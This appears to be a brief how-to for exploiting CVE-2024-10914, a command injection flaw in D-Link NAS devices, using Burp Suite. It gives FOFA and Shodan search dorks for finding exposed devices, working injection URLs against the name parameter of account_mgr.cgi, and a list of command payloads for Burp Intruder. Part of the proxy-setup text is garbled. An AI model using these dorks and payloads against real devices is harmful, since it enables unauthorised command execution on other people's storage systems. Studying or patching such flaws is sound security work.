
CVE-2024-10914_Manual testing with burpsuite
Use the following search dork to find potentially vulnerable D-Link NAS devices:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
This search string helps identify devices running the vulnerable D-Link DNS ShareCenter app with the specific version of the Lighttpd server that is affected by the vulnerability.
This guide provides step-by-step instructions on how to manually test for a Command Injection Vulnerability (CVE-2024-10914) in the name parameter of D-Link NAS using Burp Suite. Target URL: http://Target.
127.0.0.1:8080)127.0.0.1 on port 8080.http://Target.Locate the Vulnerable Parameter: In the intercepted request, find the name parameter in the URL. It should appear as:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Inject a Test Command: Modify the name parameter to include a test command like echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Send the Modified Request: Forward the modified request to the server.
Check the Response: Look for the output of the injected command in the response. For example, if the server executed echo "test", you should see:
test
Inject a Malicious Command: If the test is successful, attempt more sophisticated commands, such as:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Send the Exploit Request: Forward this request to the server.
Analyze the Response: Check if the output of the command (e.g., user ID info) is present in the response.
Use Intruder: Automate testing with Burp Suite's Intruder tool.
name parameter as the payload position.Example Payloads:
echo "test"
id
uname -a
ls /etc
Start Intruder: Run the Intruder attack to test multiple payloads automatically.